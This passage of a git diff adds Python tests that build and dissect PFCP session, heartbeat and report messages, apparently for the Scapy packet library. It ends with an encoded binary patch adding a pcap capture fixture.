02002500020000005100040000000200060013003e000103002500020000005100040000000300060013003e00010200250002000000510004000000010039000d02ffde7211a5ab800aac120101003c0006020465726777") + +pfcpSEReq3 = PFCP(seq=3) / \ + PFCPSessionEstablishmentRequest(IE_list=[ + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=6), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="SGi-LAN/N6-LAN"), + IE_NetworkInstance(instance="sgi") + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=4), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="SGi-LAN/N6-LAN"), + IE_NetworkInstance(instance="sgi"), + IE_RedirectInformation(type="URL", address="http://example.com") + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=2), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="SGi-LAN/N6-LAN"), + IE_NetworkInstance(instance="sgi") + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=5), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="Access"), + IE_NetworkInstance(instance="access") + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=3), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="Access"), + IE_NetworkInstance(instance="access") + ]) + ]), + IE_CreateFAR(IE_list=[ + IE_ApplyAction(FORW=1), + IE_FAR_Id(id=1), + IE_ForwardingParameters(IE_list=[ + IE_DestinationInterface(interface="Access"), + IE_NetworkInstance(instance="access") + ]) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=6), + IE_PDI(IE_list=[ + IE_ApplicationId(id="TST"), + IE_NetworkInstance(instance="access"), + IE_SourceInterface(interface="Access"), + IE_UE_IP_Address(ipv4='10.192.0.0', V4=1) + ]), + IE_PDR_Id(id=6), + IE_Precedence(precedence=150), + IE_URR_Id(id=3) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=4), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="access"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from 198.19.65.4 to assigned"), + IE_SourceInterface(interface="Access"), + IE_UE_IP_Address(ipv4='10.192.0.0', V4=1) + ]), + IE_PDR_Id(id=4), + IE_Precedence(precedence=100), + IE_URR_Id(id=2) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=2), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="access"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from 198.19.65.2 to assigned"), + IE_SourceInterface(interface="Access"), + IE_UE_IP_Address(ipv4='10.192.0.0', V4=1) + ]), + IE_PDR_Id(id=2), + IE_Precedence(precedence=200), + IE_URR_Id(id=1) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=5), + IE_PDI(IE_list=[ + IE_ApplicationId(id="TST"), + IE_NetworkInstance(instance="sgi"), + IE_SourceInterface(interface="SGi-LAN/N6-LAN"), + IE_UE_IP_Address(ipv4='10.192.0.0', SD=1, V4=1) + ]), + IE_PDR_Id(id=5), + IE_Precedence(precedence=150), + IE_URR_Id(id=3) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=3), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="sgi"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from 198.19.65.4 to assigned"), + IE_SourceInterface(interface="SGi-LAN/N6-LAN"), + IE_UE_IP_Address(ipv4='10.192.0.0', SD=1, V4=1) + ]), + IE_PDR_Id(id=3), + IE_Precedence(precedence=100), + IE_URR_Id(id=2) + ]), + IE_CreatePDR(IE_list=[ + IE_FAR_Id(id=1), + IE_PDI(IE_list=[ + IE_NetworkInstance(instance="sgi"), + IE_SDF_Filter(FD=1, flow_description="permit out ip from 198.19.65.2 to assigned"), + IE_SourceInterface(interface="SGi-LAN/N6-LAN"), + IE_UE_IP_Address(ipv4='10.192.0.0', SD=1, V4=1) + ]), + IE_PDR_Id(id=1), + IE_Precedence(precedence=200), + IE_URR_Id(id=1) + ]), + IE_CreateURR(IE_list=[ + IE_MeasurementMethod(VOLUM=1), + IE_ReportingTriggers(), + IE_URR_Id(id=2) + ]), + IE_CreateURR(IE_list=[ + IE_MeasurementMethod(VOLUM=1, DURAT=1), + IE_ReportingTriggers(), + IE_URR_Id(id=3) + ]), + IE_CreateURR(IE_list=[ + IE_MeasurementMethod(VOLUM=1), + IE_ReportingTriggers(), + IE_URR_Id(id=1) + ]), + IE_FSEID(ipv4='172.18.1.1', v4=1, seid=0xffde7211a5ab800a), + IE_NodeId(id_type="FQDN", id="ergw") + ]) + +assert bytes(pfcpSEReq3) == pfcpSEReq3Bytes +assert bytes(PFCP(pfcpSEReq3Bytes)) == pfcpSEReq3Bytes + += Build and dissect PFCP Session Establishment Response + +pfcpSERespBytes = hex_bytes("21330022ffde7210bf97810a0000020000130001010039000d02ffde7210bf97810aac120102") + +pfcpSEResp = PFCP(version=1, S=1, seq=2, seid=0xffde7210bf97810a) / \ + PFCPSessionEstablishmentResponse(IE_list=[ + IE_Cause(cause="Request accepted"), + IE_FSEID(ipv4="172.18.1.2", v4=1, seid=0xffde7210bf97810a), + ]) + +assert bytes(pfcpSEResp) == pfcpSERespBytes +assert bytes(PFCP(pfcpSERespBytes)) == pfcpSERespBytes +assert pfcpSEResp.answers(pfcpSEReq1) + += Build and dissect PFCP Heartbeat Request + +pfcpHReqBytes = hex_bytes("2001000c0000030000600004e1a47d08") + +pfcpHReq = PFCP(version=1, S=0, seq=3) / \ + PFCPHeartbeatRequest(IE_list=[ + IE_RecoveryTimeStamp(timestamp=3785653512) + ]) + +assert bytes(pfcpHReq) == pfcpHReqBytes +assert bytes(PFCP(pfcpHReqBytes)) == pfcpHReqBytes + +# = Build and dissect PFCP Heartbeat Response + +pfcpHRespBytes = hex_bytes("2002000c0000030000600004e1a47af9") + +pfcpHResp = PFCP(version=1, S=0, seq=3) / \ + PFCPHeartbeatResponse(IE_list=[ + IE_RecoveryTimeStamp(timestamp=3785652985) + ]) + +assert bytes(pfcpHResp) == pfcpHRespBytes +assert bytes(PFCP(pfcpHRespBytes)) == pfcpHRespBytes +assert pfcpHResp.answers(pfcpHReq) + +# = Build and dissect PFCP Session Report Request + +pfcpSRReq1Bytes = hex_bytes("21380034ffde7210bf99c00300006b0000270001020050001f00510004000000010068000400000001003f00021000005d0005020ac00001") + +pfcpSRReq1 = PFCP(seq=107, version=1, S=1, seid=18437299340760956931) / \ + PFCPSessionReportRequest(IE_list=[ + IE_ReportType(USAR=1), + IE_UsageReport_SRR(IE_list=[ + IE_URR_Id(id=1), + IE_UR_SEQN(number=1), + IE_UsageReportTrigger(START=1), + IE_UE_IP_Address(ipv4="10.192.0.1", V4=1) + ]) + ]) + +assert bytes(pfcpSRReq1) == pfcpSRReq1Bytes +assert bytes(PFCP(pfcpSRReq1Bytes)) == pfcpSRReq1Bytes + +pfcpSRReq2Bytes = hex_bytes("2138008a0ffde7210bf940000000310000270001020050007500510004000000030068000400000018003f00020100004b0004e1b44787004c0004e1b447910042001907000000000000000000000000000000000000000000000000004300040000000a8003000a48f9e1b4479137cbd8008004000a48f9e1b4478737cbd8008005000a48f9e1b4479137cbd800") + +pfcpSRReq2 = PFCP(seq=49, seid=1152331208797536256) / \ + PFCPSessionReportRequest(IE_list=[ + IE_ReportType(USAR=1), + IE_UsageReport_SRR(IE_list=[ + IE_URR_Id(id=3), + IE_UR_SEQN(number=24), + IE_UsageReportTrigger(PERIO=1), + IE_StartTime(timestamp=3786688391), + IE_EndTime(timestamp=3786688401), + IE_VolumeMeasurement( + DLVOL=1, ULVOL=1, TOVOL=1, total=0, uplink=0, downlink=0), + IE_DurationMeasurement(duration=10), + IE_EnterpriseSpecific( + ietype=32771, + enterprise_id=18681, + data=b'\xe1\xb4G\x917\xcb\xd8\x00'), + IE_EnterpriseSpecific( + ietype=32772, + enterprise_id=18681, + data=b'\xe1\xb4G\x877\xcb\xd8\x00'), + IE_EnterpriseSpecific( + ietype=32773, + enterprise_id=18681, + data=b'\xe1\xb4G\x917\xcb\xd8\x00') + ]) + ]) + +assert bytes(pfcpSRReq2) == pfcpSRReq2Bytes +assert bytes(PFCP(pfcpSRReq2Bytes)) == pfcpSRReq2Bytes + +pfcpSRReq3Bytes = hex_bytes("21380035a2a2aa9ad7f316fd0000010000270001020050002000510004000000010068000400000000003f0003100000005d000502ac100202") + +pfcpSRReq3 = PFCP(seq=1, seid=11719116762396169981) / \ + PFCPSessionReportRequest(IE_list=[ + IE_ReportType(USAR=1), + IE_UsageReport_SRR(IE_list=[ + IE_URR_Id(id=1), + IE_UR_SEQN(number=0), + IE_UsageReportTrigger(START=1, extra_data=b'\x00'), + IE_UE_IP_Address(ipv4='172.16.2.2', V4=1) + ]) + ]) + +assert bytes(pfcpSRReq3) == pfcpSRReq3Bytes +assert bytes(PFCP(pfcpSRReq3Bytes)) == pfcpSRReq3Bytes + += Build and dissect PFCP Session Report Response + +pfcpSRRespBytes = hex_bytes("21390011ffde7210bf99c00300006b000013000101") + +pfcpSRResp = PFCP(version=1, S=1, seq=107, seid=0xffde7210bf99c003) / \ + PFCPSessionReportResponse(IE_list=[ + IE_Cause(cause="Request accepted") + ]) + +assert bytes(pfcpSRResp) == pfcpSRRespBytes +assert bytes(PFCP(pfcpSRRespBytes)) == pfcpSRRespBytes +assert pfcpSRResp.answers(pfcpSRReq1) + += Build and dissect PFCP Session Modification Request + +pfcpSMReqBytes = hex_bytes("21340018ffde72125aeb00a300000600004d00080051000400000001") +pfcpSMReq = PFCP(pfcpSMReqBytes) + +pfcpSMReq = PFCP(version=1, seq=6, seid=0xffde72125aeb00a3) / \ + PFCPSessionModificationRequest(IE_list=[ + IE_QueryURR(IE_list=[IE_URR_Id(id=1)]) + ]) +assert bytes(pfcpSMReq) == pfcpSMReqBytes +assert bytes(PFCP(pfcpSMReqBytes)) == pfcpSMReqBytes + += Build and dissect PFCP Session Modification Response + +pfcpSMRespBytes = hex_bytes("2135008affde72125aeb00a3000006000013000101004e007500510004000000010068000400000000003f00028000004b0004e16e7efa004c0004e16e7efa004200190700000000000000000000000000000000000000000000000000430004000000008003000a48f9e16e7efa05566c008004000a48f9e16e7efa027f08008005000a48f9e16e7efa027f0800") + +pfcpSMResp = PFCP(version=1, seq=6, seid=0xffde72125aeb00a3) / \ + PFCPSessionModificationResponse(IE_list=[ + IE_Cause(cause=1), + IE_UsageReport_SMR(IE_list=[ + IE_URR_Id(id=1), + IE_UR_SEQN(number=0), + IE_UsageReportTrigger(IMMER=1), + IE_StartTime(timestamp=3782115066), + IE_EndTime(timestamp=3782115066), + IE_VolumeMeasurement(DLVOL=1, ULVOL=1, TOVOL=1), + IE_DurationMeasurement(), + IE_EnterpriseSpecific(ietype=32771, enterprise_id=18681, data=b'\xe1n~\xfa\x05Vl\x00'), + IE_EnterpriseSpecific(ietype=32772, enterprise_id=18681, data=b'\xe1n~\xfa\x02\x7f\x08\x00'), + IE_EnterpriseSpecific(ietype=32773, enterprise_id=18681, data=b'\xe1n~\xfa\x02\x7f\x08\x00') + ]) + ]) + +assert bytes(pfcpSMResp) == pfcpSMRespBytes +assert bytes(PFCP(pfcpSMRespBytes)) == pfcpSMRespBytes +assert pfcpSMResp.answers(pfcpSMReq) + += Verify IEs + +from difflib import unified_diff +cases = [ + dict( + hex="0054000a0100010000000a177645", + expect=IE_OuterHeaderCreation(GTPUUDPIPV4=1, TEID=0x01000000, ipv4="10.23.118.69")), + dict( + hex="002900050461626364", + expect=IE_ForwardingPolicy(policy_identifier="abcd")), + dict( + hex="002e0001ae", + expect=IE_DownlinkDataNotificationDelay(delay=174)), + dict( + hex="003d00020000", + expect=IE_PFDContents()), + dict( + hex="005e00070300205903e95d", + expect=IE_PacketRate(ULPR=1, DLPR=1, + ul_time_unit="minute", ul_max_packet_rate=8281, + dl_time_unit="day", dl_max_packet_rate=59741)), + dict( + hex="00850007010906638dccd5", + expect=IE_MACAddress(SOUR=1, source_mac="09:06:63:8d:cc:d5")), + dict( + hex="00540014080017d0bd69dceb747a1e036c0f9c8d4af115d0", + expect=IE_OuterHeaderCreation(UDPIPV6=1, + ipv6="17d0:bd69:dceb:747a:1e03:6c0f:9c8d:4af1", + port=5584)), + dict( + hex="006700050280df69b2", + expect=IE_RemoteGTP_U_Peer(V4=1, ipv4="128.223.105.178")), +] + +for case in cases: + bs = hex_bytes(case["hex"]) + exp = case["expect"] + dissected = type(exp)(bs) + exp_text = exp.show2(dump=True) + dissected_text = dissected.show2(dump=True) + if exp_text != dissected_text: + print("---\n%s\n---\n%s\n" % (exp_text, dissected_text)) + for line in unified_diff(exp_text.split("\n"), dissected_text.split("\n"), + fromfile="expected", tofile="dissected"): + print(line) + raise AssertionError("text mismatch") + assert bytes(dissected) == bs + assert bytes(exp) == bs + +# from difflib import unified_diff +# expected = PFCP(pfcpSRReq2Bytes).show2(dump=True).split("\n") +# actual = pfcpSRReq2.show2(dump=True).split("\n") +# for line in unified_diff(expected, actual, fromfile="expected", tofile="actual"): +# print(line) diff --git a/test/pcaps/pfcp.pcap b/test/pcaps/pfcp.pcap new file mode 100644 index 0000000000000000000000000000000000000000..89fb650a9bbce876b45bb60099c6f5bde7d05a89 GIT binary patch literal 46260 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 